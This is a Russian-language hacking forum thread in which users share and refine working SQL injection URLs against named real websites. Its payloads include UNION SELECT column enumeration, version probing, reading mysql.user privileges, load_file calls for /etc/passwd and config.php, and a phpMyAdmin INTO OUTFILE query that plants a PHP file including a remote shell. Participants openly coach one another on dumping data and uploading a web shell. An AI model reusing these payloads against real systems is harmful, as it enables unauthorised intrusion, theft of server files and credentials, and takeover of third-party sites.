Вот дилема =) Стока мучился... вобщем можно ли как нибудь вывести Code: http://www.auto24team.de/index.php?who=-999+ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,343,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419-- http://www.auto24team.de/index.php?who=1 group by 419-- Все норм. Тока вывод пропал... =)
Assembler, и ты вручную вбивал ? Оо Муторно это ковырять ... http://www.auto24team.de/fiat.php?sectio=16+and+if(substring(version(),1,1)=4,1,0)=1/*&who=1&info=1 4 ветка
Да вручную... Потом делфу запустил и программку написал которая сама делает, =) скока напишешь стока числе подряд через запятую =)
Привет всем. Есть у меня SQL Инъекция http://www.yivo.org/index.php?tid=-99999+union+select+1,2,3,4,5,6,7,8,9/* но поля почему-то не выводятся. Это слепая инъекция (с такими дела не имел)?
159932, спасибо, это и есть слепая инъекция? И если можно - объясните пожалуйста что значит and+1=0...
какая слепа???? Code: http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9/* и вообще лей шелл: Code: http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(file_priv)),5,6,7,8,9+from+mysql.user/* правда там сложновато будет) Code: http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9/*
Pashkela, спасибо и вам. Язнаю что такое unhex и hex. Но все же мне интерестно, что значит вот это: and+1=0? Я извеняюсь, в инъекциях я новичок, вот и хочу подучиться...
просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью https://forum.antichat.ru/thread104591.html кстати вот еще довольно интересная инфо: Code: http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_file(0x636F6E6669672E706870),5,6,7,8,9/* а нужны данные из базы - только брут. Например SIPT4
Спасибо, логично. Я пытался минусом и кавычкой, но не выводилось ничего. Значит load_file работает? + Сервер на виндовсе стоит... + Расскрыте путей DB! Спасибо!
все гораздо банальнее интересно как) правда, значение восьмой колонки участвует в другом запросе (8=username), но и там ковычки слешируются: 2. Assembler вобще говоря, в таких случаях лучше всего рассматривать информативный текст (аля 0xlala) вывод в исходниках: file_priv=y, и судя по выводу на серваке есть pma
Здравстуйет Вопрос такой В phpmyadmin`е сделал запрос вида select '<? @include("http://__________/shell.txt"); ?>' into outfile '\htdocs\shelll.php' вернул истину,при попытке обратится к файлу http://__________/shell.txt пишет страница не существует!
into outfile '\htdocs\shelll.php' при попытке обратится к файлу http://__________/shell.txt а теперь подумай
